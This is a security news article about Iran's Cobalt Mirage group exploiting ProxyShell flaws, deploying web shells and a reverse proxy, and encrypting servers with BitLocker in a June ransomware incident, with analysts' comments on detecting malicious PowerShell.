PowerShell used by Iran’s Cobalt Mirage in June ransomware attack

The Iranian flag is seen in front of the headquarters building of the International Atomic Energy Agency (IAEA) in Vienna, Austria. (Photo by Michael Gruber/Getty Images)

Researchers reporting on a ransomware incident in June on Wednesday found that Iran’s Cobalt Mirage group linked to the Islamic Revolutionary Guard Corps (IRGC) was exploiting vulnerabilities in ProxyShell, including CVE-2021-34473, CVE-2021-34523and CVE-2021-31207highlighting the need for security teams to better detect malicious PowerShell activity.

In a blog post, the Secureworks researchers said it’s likely the compromise was opportunistic rather than targeted at a particular organization or group. The researchers said that, consistent with their established intrusion pattern, Cobalt Mirage deployed multiple web shells and TunnelFish, a custom variant of Fast Reverse Proxy (PRGF).

Once they deployed the web shells and FRPC, the threat actors then activated the default account with a password that researchers believe was commonly used by Cobalt Mirage ([email protected]) and encrypted multiple servers using BitLocker.

The TTPs used in the attack are mostly commonplace across the board, and the attack was as the blog puts it — almost certainly opportunistic — said Geoff Fisher, senior director, integration strategy at Tanium. Fisher said the investigation by Secureworks is quite good and very thorough in tracing the Iranian threat group’s activity on a number of fronts.

“Like the FSB, the IRGC uses contractors to research IP and allow them to make money from ransomware,” Fisher said. “The playbook here is tried, true, and profitable for groups. But like many eCrime groups, they can get sloppy in the craft, which is why it was so easy to trace back to the IRGC. From the point of view of day-to-day security operations, this poses no more undue risk than normal. Operators should note the information presented for C2 here and fix their systems, as the two vulnerabilities listed are very well known, old, and exploited, per CISA guidelines.

Threat groups continue to abuse legitimate tools, such as PowerShell, said Nicole Hoffman, senior cyber threat intelligence analyst at Digital Shadows. Hoffman said the industry is past the proof-of-concept stage for malicious abuse of PowerShell.

“Regardless of attacker sophistication, PowerShell remains a widespread problem,” Hoffman said. “Organizations need to ensure they have visibility to detect malicious PowerShell activity. Additionally, there seems to be a greater tendency for threat actors to misuse BitLocker for encryption capabilities.


Comments are closed.